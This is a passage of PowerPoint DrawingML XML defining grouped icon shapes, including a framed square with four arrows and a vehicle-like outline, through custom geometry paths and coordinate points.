            <a:xfrm>
              <a:off x="4588200" y="3940944"/>
              <a:ext cx="532387" cy="538051"/>
              <a:chOff x="5919847" y="2101238"/>
              <a:chExt cx="723784" cy="731484"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14" name="AutoShape 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06131A15-CF9C-48AB-9B0C-ED611621D516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919847" y="2101238"/>
                <a:ext cx="723784" cy="7314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5" name="Rectangle 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83CAD4FA-4A04-4670-A8A1-1E64E4DA4E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7577" y="2179643"/>
                <a:ext cx="566738" cy="5730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58116060-8D87-4886-B357-C82B758339C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81702" y="2163768"/>
                <a:ext cx="596900" cy="603250"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 376"/>
                  <a:gd name="T1" fmla="*/ 0 h 380"/>
                  <a:gd name="T2" fmla="*/ 0 w 376"/>
                  <a:gd name="T3" fmla="*/ 380 h 380"/>
                  <a:gd name="T4" fmla="*/ 376 w 376"/>
                  <a:gd name="T5" fmla="*/ 380 h 380"/>
                  <a:gd name="T6" fmla="*/ 376 w 376"/>
                  <a:gd name="T7" fmla="*/ 0 h 380"/>
                  <a:gd name="T8" fmla="*/ 0 w 376"/>
                  <a:gd name="T9" fmla="*/ 0 h 380"/>
                  <a:gd name="T10" fmla="*/ 358 w 376"/>
                  <a:gd name="T11" fmla="*/ 362 h 380"/>
                  <a:gd name="T12" fmla="*/ 19 w 376"/>
                  <a:gd name="T13" fmla="*/ 362 h 380"/>
                  <a:gd name="T14" fmla="*/ 19 w 376"/>
                  <a:gd name="T15" fmla="*/ 19 h 380"/>
                  <a:gd name="T16" fmla="*/ 358 w 376"/>
                  <a:gd name="T17" fmla="*/ 19 h 380"/>
                  <a:gd name="T18" fmla="*/ 358 w 376"/>
                  <a:gd name="T19" fmla="*/ 362 h 380"/>
                  <a:gd name="T20" fmla="*/ 265 w 376"/>
                  <a:gd name="T21" fmla="*/ 201 h 380"/>
                  <a:gd name="T22" fmla="*/ 318 w 376"/>
                  <a:gd name="T23" fmla="*/ 201 h 380"/>
                  <a:gd name="T24" fmla="*/ 318 w 376"/>
                  <a:gd name="T25" fmla="*/ 182 h 380"/>
                  <a:gd name="T26" fmla="*/ 265 w 376"/>
                  <a:gd name="T27" fmla="*/ 182 h 380"/>
                  <a:gd name="T28" fmla="*/ 265 w 376"/>
                  <a:gd name="T29" fmla="*/ 167 h 380"/>
                  <a:gd name="T30" fmla="*/ 229 w 376"/>
                  <a:gd name="T31" fmla="*/ 192 h 380"/>
                  <a:gd name="T32" fmla="*/ 265 w 376"/>
                  <a:gd name="T33" fmla="*/ 216 h 380"/>
                  <a:gd name="T34" fmla="*/ 265 w 376"/>
                  <a:gd name="T35" fmla="*/ 201 h 380"/>
                  <a:gd name="T36" fmla="*/ 179 w 376"/>
                  <a:gd name="T37" fmla="*/ 152 h 380"/>
                  <a:gd name="T38" fmla="*/ 197 w 376"/>
                  <a:gd name="T39" fmla="*/ 152 h 380"/>
                  <a:gd name="T40" fmla="*/ 197 w 376"/>
                  <a:gd name="T41" fmla="*/ 99 h 380"/>
                  <a:gd name="T42" fmla="*/ 212 w 376"/>
                  <a:gd name="T43" fmla="*/ 99 h 380"/>
                  <a:gd name="T44" fmla="*/ 188 w 376"/>
                  <a:gd name="T45" fmla="*/ 62 h 380"/>
                  <a:gd name="T46" fmla="*/ 164 w 376"/>
                  <a:gd name="T47" fmla="*/ 99 h 380"/>
                  <a:gd name="T48" fmla="*/ 179 w 376"/>
                  <a:gd name="T49" fmla="*/ 99 h 380"/>
                  <a:gd name="T50" fmla="*/ 179 w 376"/>
                  <a:gd name="T51" fmla="*/ 152 h 380"/>
                  <a:gd name="T52" fmla="*/ 111 w 376"/>
                  <a:gd name="T53" fmla="*/ 216 h 380"/>
                  <a:gd name="T54" fmla="*/ 148 w 376"/>
                  <a:gd name="T55" fmla="*/ 192 h 380"/>
                  <a:gd name="T56" fmla="*/ 111 w 376"/>
                  <a:gd name="T57" fmla="*/ 167 h 380"/>
                  <a:gd name="T58" fmla="*/ 111 w 376"/>
                  <a:gd name="T59" fmla="*/ 182 h 380"/>
                  <a:gd name="T60" fmla="*/ 59 w 376"/>
                  <a:gd name="T61" fmla="*/ 182 h 380"/>
                  <a:gd name="T62" fmla="*/ 59 w 376"/>
                  <a:gd name="T63" fmla="*/ 201 h 380"/>
                  <a:gd name="T64" fmla="*/ 111 w 376"/>
                  <a:gd name="T65" fmla="*/ 201 h 380"/>
                  <a:gd name="T66" fmla="*/ 111 w 376"/>
                  <a:gd name="T67" fmla="*/ 216 h 380"/>
                  <a:gd name="T68" fmla="*/ 212 w 376"/>
                  <a:gd name="T69" fmla="*/ 276 h 380"/>
                  <a:gd name="T70" fmla="*/ 197 w 376"/>
                  <a:gd name="T71" fmla="*/ 276 h 380"/>
                  <a:gd name="T72" fmla="*/ 197 w 376"/>
                  <a:gd name="T73" fmla="*/ 223 h 380"/>
                  <a:gd name="T74" fmla="*/ 179 w 376"/>
                  <a:gd name="T75" fmla="*/ 223 h 380"/>
                  <a:gd name="T76" fmla="*/ 179 w 376"/>
                  <a:gd name="T77" fmla="*/ 276 h 380"/>
                  <a:gd name="T78" fmla="*/ 164 w 376"/>
                  <a:gd name="T79" fmla="*/ 276 h 380"/>
                  <a:gd name="T80" fmla="*/ 188 w 376"/>
                  <a:gd name="T81" fmla="*/ 313 h 380"/>
                  <a:gd name="T82" fmla="*/ 212 w 376"/>
                  <a:gd name="T83" fmla="*/ 276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76" h="380">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="358" y="362"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="19" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="358" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="358" y="362"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="265" y="201"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="318" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="318" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="201"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="179" y="152"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="197" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="152"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="111" y="216"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="148" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="216"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="212" y="276"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="197" y="276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="276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17" name="Group 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B66CACA5-08F4-4BA1-8B85-5BD9CF6407F7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2154820" y="2627651"/>
              <a:ext cx="969384" cy="538494"/>
              <a:chOff x="2875252" y="2415216"/>
              <a:chExt cx="969384" cy="538494"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="18" name="AutoShape 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5B6E7DF-4F89-466D-B5B0-8EF7D71B20B4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2875252" y="2415216"/>
                <a:ext cx="969384" cy="5384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19" name="Rectangle 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FDD0D55-26BB-4311-9FE6-8859D12C3E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5450" y="2640013"/>
                <a:ext cx="788988" cy="20002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C9AD8906-452B-4C74-A371-64F2BDD2D6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08375" y="2724150"/>
                <a:ext cx="147638" cy="30163"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 62 w 93"/>
                  <a:gd name="T1" fmla="*/ 0 h 19"/>
                  <a:gd name="T2" fmla="*/ 62 w 93"/>
                  <a:gd name="T3" fmla="*/ 19 h 19"/>
                  <a:gd name="T4" fmla="*/ 93 w 93"/>
                  <a:gd name="T5" fmla="*/ 19 h 19"/>
                  <a:gd name="T6" fmla="*/ 93 w 93"/>
                  <a:gd name="T7" fmla="*/ 0 h 19"/>
                  <a:gd name="T8" fmla="*/ 62 w 93"/>
                  <a:gd name="T9" fmla="*/ 0 h 19"/>
                  <a:gd name="T10" fmla="*/ 0 w 93"/>
                  <a:gd name="T11" fmla="*/ 19 h 19"/>
                  <a:gd name="T12" fmla="*/ 31 w 93"/>
                  <a:gd name="T13" fmla="*/ 19 h 19"/>
                  <a:gd name="T14" fmla="*/ 31 w 93"/>
                  <a:gd name="T15" fmla="*/ 0 h 19"/>
                  <a:gd name="T16" fmla="*/ 0 w 93"/>
                  <a:gd name="T17" fmla="*/ 0 h 19"/>
                  <a:gd name="T18" fmla="*/ 0 w 93"/>
                  <a:gd name="T1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3" h="19">
                    <a:moveTo>
                      <a:pt x="62" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="62" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="0" y="19"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="31" y="19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8B8AB2F5-7D91-48D3-AFEB-420A8BD33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65450" y="2640013"/>
                <a:ext cx="296863" cy="200025"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 187 w 187"/>
                  <a:gd name="T1" fmla="*/ 0 h 126"/>
                  <a:gd name="T2" fmla="*/ 0 w 187"/>
                  <a:gd name="T3" fmla="*/ 0 h 126"/>
                  <a:gd name="T4" fmla="*/ 0 w 187"/>
                  <a:gd name="T5" fmla="*/ 126 h 126"/>
                  <a:gd name="T6" fmla="*/ 124 w 187"/>
                  <a:gd name="T7" fmla="*/ 126 h 126"/>
                  <a:gd name="T8" fmla="*/ 187 w 187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126">
                    <a:moveTo>
                      <a:pt x="187" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="126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rgbClr val="015C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8A61AA31-2317-467C-B1C1-2BFC8E419C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51163" y="2486025"/>
                <a:ext cx="817563" cy="398463"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 790"/>
                  <a:gd name="T1" fmla="*/ 351 h 379"/>
                  <a:gd name="T2" fmla="*/ 62 w 790"/>
                  <a:gd name="T3" fmla="*/ 379 h 379"/>
                  <a:gd name="T4" fmla="*/ 204 w 790"/>
                  <a:gd name="T5" fmla="*/ 351 h 379"/>
                  <a:gd name="T6" fmla="*/ 585 w 790"/>
                  <a:gd name="T7" fmla="*/ 379 h 379"/>
                  <a:gd name="T8" fmla="*/ 728 w 790"/>
                  <a:gd name="T9" fmla="*/ 351 h 379"/>
                  <a:gd name="T10" fmla="*/ 790 w 790"/>
                  <a:gd name="T11" fmla="*/ 132 h 379"/>
                  <a:gd name="T12" fmla="*/ 196 w 790"/>
                  <a:gd name="T13" fmla="*/ 323 h 379"/>
                  <a:gd name="T14" fmla="*/ 28 w 790"/>
                  <a:gd name="T15" fmla="*/ 160 h 379"/>
                  <a:gd name="T16" fmla="*/ 196 w 790"/>
                  <a:gd name="T17" fmla="*/ 323 h 379"/>
                  <a:gd name="T18" fmla="*/ 227 w 790"/>
                  <a:gd name="T19" fmla="*/ 323 h 379"/>
                  <a:gd name="T20" fmla="*/ 762 w 790"/>
                  <a:gd name="T21" fmla="*/ 160 h 379"/>
                  <a:gd name="T22" fmla="*/ 589 w 790"/>
                  <a:gd name="T23" fmla="*/ 73 h 379"/>
                  <a:gd name="T24" fmla="*/ 552 w 790"/>
                  <a:gd name="T25" fmla="*/ 54 h 379"/>
                  <a:gd name="T26" fmla="*/ 582 w 790"/>
                  <a:gd name="T27" fmla="*/ 36 h 379"/>
                  <a:gd name="T28" fmla="*/ 552 w 790"/>
                  <a:gd name="T29" fmla="*/ 19 h 379"/>
                  <a:gd name="T30" fmla="*/ 588 w 790"/>
                  <a:gd name="T31" fmla="*/ 1 h 379"/>
                  <a:gd name="T32" fmla="*/ 531 w 790"/>
                  <a:gd name="T33" fmla="*/ 91 h 379"/>
                  <a:gd name="T34" fmla="*/ 589 w 790"/>
                  <a:gd name="T35" fmla="*/ 73 h 379"/>
                  <a:gd name="T36" fmla="*/ 487 w 790"/>
                  <a:gd name="T37" fmla="*/ 73 h 379"/>
                  <a:gd name="T38" fmla="*/ 465 w 790"/>
                  <a:gd name="T39" fmla="*/ 1 h 379"/>
                  <a:gd name="T40" fmla="*/ 521 w 790"/>
                  <a:gd name="T41" fmla="*/ 91 h 379"/>
                  <a:gd name="T42" fmla="*/ 629 w 790"/>
                  <a:gd name="T43" fmla="*/ 74 h 379"/>
                  <a:gd name="T44" fmla="*/ 595 w 790"/>
                  <a:gd name="T45" fmla="*/ 80 h 379"/>
                  <a:gd name="T46" fmla="*/ 662 w 790"/>
                  <a:gd name="T47" fmla="*/ 64 h 379"/>
                  <a:gd name="T48" fmla="*/ 634 w 790"/>
                  <a:gd name="T49" fmla="*/ 35 h 379"/>
                  <a:gd name="T50" fmla="*/ 631 w 790"/>
                  <a:gd name="T51" fmla="*/ 18 h 379"/>
                  <a:gd name="T52" fmla="*/ 660 w 790"/>
                  <a:gd name="T53" fmla="*/ 11 h 379"/>
                  <a:gd name="T54" fmla="*/ 598 w 790"/>
                  <a:gd name="T55" fmla="*/ 27 h 379"/>
                  <a:gd name="T56" fmla="*/ 628 w 790"/>
                  <a:gd name="T57" fmla="*/ 56 h 379"/>
                  <a:gd name="T58" fmla="*/ 629 w 790"/>
                  <a:gd name="T59" fmla="*/ 74 h 379"/>
                  <a:gd name="T60" fmla="*/ 255 w 790"/>
                  <a:gd name="T61" fmla="*/ 70 h 379"/>
                  <a:gd name="T62" fmla="*/ 287 w 790"/>
                  <a:gd name="T63" fmla="*/ 91 h 379"/>
                  <a:gd name="T64" fmla="*/ 281 w 790"/>
                  <a:gd name="T65" fmla="*/ 1 h 379"/>
                  <a:gd name="T66" fmla="*/ 228 w 790"/>
                  <a:gd name="T67" fmla="*/ 91 h 379"/>
                  <a:gd name="T68" fmla="*/ 261 w 790"/>
                  <a:gd name="T69" fmla="*/ 46 h 379"/>
                  <a:gd name="T70" fmla="*/ 268 w 790"/>
                  <a:gd name="T71" fmla="*/ 17 h 379"/>
                  <a:gd name="T72" fmla="*/ 277 w 790"/>
                  <a:gd name="T73" fmla="*/ 54 h 379"/>
                  <a:gd name="T74" fmla="*/ 261 w 790"/>
                  <a:gd name="T75" fmla="*/ 46 h 379"/>
                  <a:gd name="T76" fmla="*/ 421 w 790"/>
                  <a:gd name="T77" fmla="*/ 61 h 379"/>
                  <a:gd name="T78" fmla="*/ 420 w 790"/>
                  <a:gd name="T79" fmla="*/ 1 h 379"/>
                  <a:gd name="T80" fmla="*/ 389 w 790"/>
                  <a:gd name="T81" fmla="*/ 91 h 379"/>
                  <a:gd name="T82" fmla="*/ 410 w 790"/>
                  <a:gd name="T83" fmla="*/ 61 h 379"/>
                  <a:gd name="T84" fmla="*/ 419 w 790"/>
                  <a:gd name="T85" fmla="*/ 18 h 379"/>
                  <a:gd name="T86" fmla="*/ 420 w 790"/>
                  <a:gd name="T87" fmla="*/ 44 h 379"/>
                  <a:gd name="T88" fmla="*/ 410 w 790"/>
                  <a:gd name="T89" fmla="*/ 18 h 379"/>
                  <a:gd name="T90" fmla="*/ 175 w 790"/>
                  <a:gd name="T91" fmla="*/ 52 h 379"/>
                  <a:gd name="T92" fmla="*/ 179 w 790"/>
                  <a:gd name="T93" fmla="*/ 31 h 379"/>
                  <a:gd name="T94" fmla="*/ 191 w 790"/>
                  <a:gd name="T95" fmla="*/ 91 h 379"/>
                  <a:gd name="T96" fmla="*/ 233 w 790"/>
                  <a:gd name="T97" fmla="*/ 1 h 379"/>
                  <a:gd name="T98" fmla="*/ 207 w 790"/>
                  <a:gd name="T99" fmla="*/ 42 h 379"/>
                  <a:gd name="T100" fmla="*/ 203 w 790"/>
                  <a:gd name="T101" fmla="*/ 70 h 379"/>
                  <a:gd name="T102" fmla="*/ 188 w 790"/>
                  <a:gd name="T103" fmla="*/ 1 h 379"/>
                  <a:gd name="T104" fmla="*/ 161 w 790"/>
                  <a:gd name="T105" fmla="*/ 42 h 379"/>
                  <a:gd name="T106" fmla="*/ 156 w 790"/>
                  <a:gd name="T107" fmla="*/ 70 h 379"/>
                  <a:gd name="T108" fmla="*/ 146 w 790"/>
                  <a:gd name="T109" fmla="*/ 1 h 379"/>
                  <a:gd name="T110" fmla="*/ 141 w 790"/>
                  <a:gd name="T111" fmla="*/ 91 h 379"/>
                  <a:gd name="T112" fmla="*/ 334 w 790"/>
                  <a:gd name="T113" fmla="*/ 61 h 379"/>
                  <a:gd name="T114" fmla="*/ 380 w 790"/>
                  <a:gd name="T115" fmla="*/ 30 h 379"/>
                  <a:gd name="T116" fmla="*/ 312 w 790"/>
                  <a:gd name="T117" fmla="*/ 1 h 379"/>
                  <a:gd name="T118" fmla="*/ 334 w 790"/>
                  <a:gd name="T119" fmla="*/ 91 h 379"/>
                  <a:gd name="T120" fmla="*/ 334 w 790"/>
                  <a:gd name="T121" fmla="*/ 18 h 379"/>
                  <a:gd name="T122" fmla="*/ 359 w 790"/>
                  <a:gd name="T123" fmla="*/ 30 h 379"/>
                  <a:gd name="T124" fmla="*/ 334 w 790"/>
                  <a:gd name="T125" fmla="*/ 44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90" h="379">
                    <a:moveTo>
                      <a:pt x="0" y="132"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="351"/>
                      <a:pt x="0" y="351"/>
                      <a:pt x="0" y="351"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="351"/>
                      <a:pt x="62" y="351"/>
                      <a:pt x="62" y="351"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="379"/>
                      <a:pt x="62" y="379"/>
                      <a:pt x="62" y="379"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="204" y="379"/>
                      <a:pt x="204" y="379"/>
                      <a:pt x="204" y="379"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="204" y="351"/>
                      <a:pt x="204" y="351"/>
                      <a:pt x="204" y="351"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="585" y="351"/>
                      <a:pt x="585" y="351"/>
                      <a:pt x="585" y="351"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="585" y="379"/>
                      <a:pt x="585" y="379"/>
                      <a:pt x="585" y="379"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="728" y="379"/>
                      <a:pt x="728" y="379"/>
                      <a:pt x="728" y="379"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="728" y="351"/>
                      <a:pt x="728" y="351"/>
                      <a:pt x="728" y="351"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="790" y="351"/>
                      <a:pt x="790" y="351"/>
                      <a:pt x="790" y="351"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="790" y="132"/>
                      <a:pt x="790" y="132"/>
                      <a:pt x="790" y="132"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="132"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="196" y="323"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="323"/>
                      <a:pt x="28" y="323"/>
                      <a:pt x="28" y="323"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="160"/>
                      <a:pt x="28" y="160"/>
                      <a:pt x="28" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="277" y="160"/>
                      <a:pt x="277" y="160"/>
                      <a:pt x="277" y="160"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="196" y="323"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="762" y="323"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="227" y="323"/>
                      <a:pt x="227" y="323"/>
                      <a:pt x="227" y="323"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="308" y="160"/>
                      <a:pt x="308" y="160"/>
                      <a:pt x="308" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="762" y="160"/>
                      <a:pt x="762" y="160"/>
                      <a:pt x="762" y="160"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="762" y="323"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="589" y="73"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="552" y="73"/>
                      <a:pt x="552" y="73"/>
                      <a:pt x="552" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="552" y="54"/>
                      <a:pt x="552" y="54"/>
                      <a:pt x="552" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="582" y="54"/>
                      <a:pt x="582" y="54"/>
                      <a:pt x="582" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="582" y="36"/>
                      <a:pt x="582" y="36"/>
                      <a:pt x="582" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="552" y="36"/>
                      <a:pt x="552" y="36"/>
                      <a:pt x="552" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="552" y="19"/>
                      <a:pt x="552" y="19"/>
                      <a:pt x="552" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="588" y="19"/>
                      <a:pt x="588" y="19"/>
                      <a:pt x="588" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="588" y="1"/>
                      <a:pt x="588" y="1"/>
                      <a:pt x="588" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="531" y="1"/>
                      <a:pt x="531" y="1"/>
                      <a:pt x="531" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="531" y="91"/>
                      <a:pt x="531" y="91"/>
                      <a:pt x="531" y="91"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="589" y="91"/>
                      <a:pt x="589" y="91"/>
                      <a:pt x="589" y="91"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="589" y="73"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="521" y="73"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="487" y="73"/>
                      <a:pt x="487" y="73"/>
                      <a:pt x="487" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="487" y="1"/>
                      <a:pt x="487" y="1"/>
                      <a:pt x="487" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="465" y="1"/>
                      <a:pt x="465" y="1"/>
                      <a:pt x="465" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="465" y="91"/>
                      <a:pt x="465" y="91"/>
                      <a:pt x="465" y="91"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="521" y="91"/>
                      <a:pt x="521" y="91"/>
                      <a:pt x="521" y="91"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="521" y="73"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="629" y="74"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="622" y="74"/>
                      <a:pt x="613" y="70"/>
                      <a:pt x="607" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="595" y="80"/>
                      <a:pt x="595" y="80"/>
                      <a:pt x="595" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="604" y="88"/>
                      <a:pt x="617" y="92"/>
                      <a:pt x="628" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="650" y="92"/>
                      <a:pt x="662" y="79"/>
                      <a:pt x="662" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="662" y="52"/>
                      <a:pt x="656" y="44"/>
                      <a:pt x="645" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="634" y="35"/>
                      <a:pt x="634" y="35"/>
                      <a:pt x="634" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="626" y="32"/>
                      <a:pt x="620" y="30"/>
                      <a:pt x="620" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="620" y="21"/>
                      <a:pt x="624" y="18"/>
                      <a:pt x="631" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="638" y="18"/>
                      <a:pt x="643" y="20"/>
                      <a:pt x="649" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="660" y="11"/>
                      <a:pt x="660" y="11"/>
                      <a:pt x="660" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="652" y="4"/>
                      <a:pt x="641" y="0"/>
                      <a:pt x="631" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="612" y="0"/>
                      <a:pt x="598" y="12"/>
                      <a:pt x="598" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="598" y="40"/>
                      <a:pt x="607" y="47"/>
                      <a:pt x="616" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="628" y="56"/>
                      <a:pt x="628" y="56"/>
                      <a:pt x="628" y="56"/>
                    </a:cubicBezTo>
